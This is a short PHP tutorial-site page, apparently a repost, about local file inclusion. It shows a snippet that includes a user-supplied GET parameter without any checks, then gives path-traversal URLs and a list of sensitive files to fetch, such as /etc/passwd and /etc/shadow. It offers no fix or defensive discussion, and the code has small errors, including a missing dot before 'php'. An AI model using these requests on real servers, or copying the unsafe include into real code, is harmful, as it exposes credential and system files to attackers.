Home >Backend Development >PHP Tutorial >PHP forges local files containing vulnerable code

PHP forges local files containing vulnerable code

高洛峰
高洛峰Original
2016-11-30 13:17:231267browse

The code is as follows:
$page=$_GET['page'];
include($page.'php');
?>

You can use it like this
http://www.xxx .com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www .xxx.com/index.php?page=..../../etc/passwd

Get more data:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc /group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn